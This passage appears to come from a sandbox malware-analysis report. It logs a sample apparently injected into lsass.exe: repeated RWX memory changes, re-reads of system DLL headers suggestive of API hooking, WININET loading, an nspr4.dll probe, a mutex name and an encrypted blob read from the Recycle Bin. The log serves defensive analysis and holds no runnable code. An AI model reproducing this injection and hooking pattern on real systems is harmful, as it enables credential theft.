692 C:\WINDOWS\system32\lsass.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
692 C:\WINDOWS\system32\lsass.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
692 C:\WINDOWS\system32\lsass.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
692 C:\WINDOWS\system32\lsass.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
692 C:\WINDOWS\system32\lsass.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
692 C:\WINDOWS\system32\lsass.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
692 C:\WINDOWS\system32\lsass.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
692 C:\WINDOWS\system32\lsass.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
692 C:\WINDOWS\system32\lsass.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
692 C:\WINDOWS\system32\lsass.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2031079937
Thread created PID: 692 TID: 660 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031084682
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031086781
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2031089015
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 9C0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2031122248
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2031130836
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2031143263
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2031279926
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2031290718
Thread created PID: 692 TID: 2628 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031295631
Thread delayed Time: 0 TID: 9768 success or wait 2031297173
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2031297765
System info queried Type: BasicInformation success or wait 2031298069
System info queried Type: ProcessorInformation success or wait 2031298368
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031298774
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031299617
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031299880
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031300255
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031300513
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031300820
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031301414
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031301672
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031302591
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031302935
System info queried Type: BasicInformation success or wait 2031303734
System info queried Type: ProcessorInformation success or wait 2031304029
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031305304
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031305610
Thread created PID: 692 TID: 2624 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031307204
Thread created PID: 692 TID: 1932 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031309892
Thread delayed Time: 0 TID: 9768 success or wait 2031312203
Thread delayed Time: 0 TID: 9768 success or wait 2031312598
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031312781
System info queried Type: BasicInformation success or wait 2031313081
System info queried Type: ProcessorInformation success or wait 2031313376
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031313781
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031314630
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031314892
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031315277
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031315533
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031315841
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031316435
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031316767
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031317294
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031317630
System info queried Type: BasicInformation success or wait 2031318430
System info queried Type: ProcessorInformation success or wait 2031318725
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031319945
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031320250
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031320557
System info queried Type: BasicInformation success or wait 2031320848
System info queried Type: ProcessorInformation success or wait 2031321138
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031321542
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031322380
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031322642
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031323026
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031323358
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031323783
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031324622
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031324968
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031325688
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031326264
System info queried Type: BasicInformation success or wait 2031327261
System info queried Type: ProcessorInformation success or wait 2031327672
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031329116
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031329425
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2031329734
System info queried Type: BasicInformation success or wait 2031330028
System info queried Type: ProcessorInformation success or wait 2031330318
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031330726
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031331598
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031331863
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031332256
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031332517
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031332827
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031333431
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031333691
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031334221
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031334558
System info queried Type: BasicInformation success or wait 2031335356
System info queried Type: ProcessorInformation success or wait 2031335650
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031337033
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031337337
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031337851
System info queried Type: BasicInformation success or wait 2031338145
System info queried Type: ProcessorInformation success or wait 2031338434
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031338840
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031339691
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031339954
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031340342
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031340601
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031340911
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031341513
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031341772
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031342299
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031342633
System info queried Type: BasicInformation success or wait 2031343419
System info queried Type: ProcessorInformation success or wait 2031343713
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031344927
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031345231
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2031346252
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2031348082
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2031349092
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031363007
System info queried Type: BasicInformation success or wait 2031363239
System info queried Type: ProcessorInformation success or wait 2031363550
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031363968
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031364836
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2031365109
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031365741
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031366015
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2031366337
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031366954
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2031367224
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2031367762
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2031368111
System info queried Type: BasicInformation success or wait 2031368974
System info queried Type: ProcessorInformation success or wait 2031369278
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031370482
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031370796
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031370998
System info queried Type: BasicInformation success or wait 2031371378
System info queried Type: ProcessorInformation success or wait 2031371672
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031372092
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031372945
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031373213
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031373916
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031374181
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031374498
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031375108
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031375372
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031375908
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031376253
System info queried Type: BasicInformation success or wait 2031377076
System info queried Type: ProcessorInformation success or wait 2031377378
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031378974
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031379275
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031379665
System info queried Type: BasicInformation success or wait 2031379958
System info queried Type: ProcessorInformation success or wait 2031380253
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031380668
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031381517
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031381791
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031382228
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031382497
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031382811
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031383422
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031383688
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031384224
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031384567
System info queried Type: BasicInformation success or wait 2031385387
System info queried Type: ProcessorInformation success or wait 2031385688
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031387364
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031387667
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031388057
System info queried Type: BasicInformation success or wait 2031388350
System info queried Type: ProcessorInformation success or wait 2031388643
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031389057
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031389907
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031390174
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031390572
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031390838
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031391152
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031391762
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031394007
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031394629
